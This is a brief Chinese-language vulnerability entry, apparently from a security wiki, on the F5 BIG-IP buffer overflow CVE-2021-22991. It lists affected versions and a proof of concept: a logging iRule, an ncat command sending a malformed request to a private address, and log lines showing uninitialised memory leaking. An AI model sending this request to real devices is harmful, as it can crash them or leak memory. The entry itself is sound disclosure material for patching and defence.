跳转至

BIG-IP 缓冲区溢出漏洞 (CVE-2021-22991)

系统可能会错误地处理对虚拟服务器的请求,触发缓冲区溢出,从而导致DoS攻击。理论上可以绕过基于URL的访问控制或远程代码执行(RCE)。

影响版本:

BIG-IP (All Modules):

  • 16.0.0-16.0.1
  • 15.1.0-15.1.2
  • 14.1.0-14.1.3.1
  • 13.1.0-13.1.3.5
  • 12.1.0-12.1.5.2

PoC:

iRule:

when HTTP_REQUEST { 
log local0. \"normalized: [HTTP::uri -normalized]\" 
log local0. \"uri: [HTTP::uri]\" }

请求:

echo -e \"GET h://[f] HTTP/1.1\\
\\
\" | ncat --ssl 10.154.0.3 443

未初始化的内存直接记录到 /var/log/ltm:

Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ 
Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa]

ref: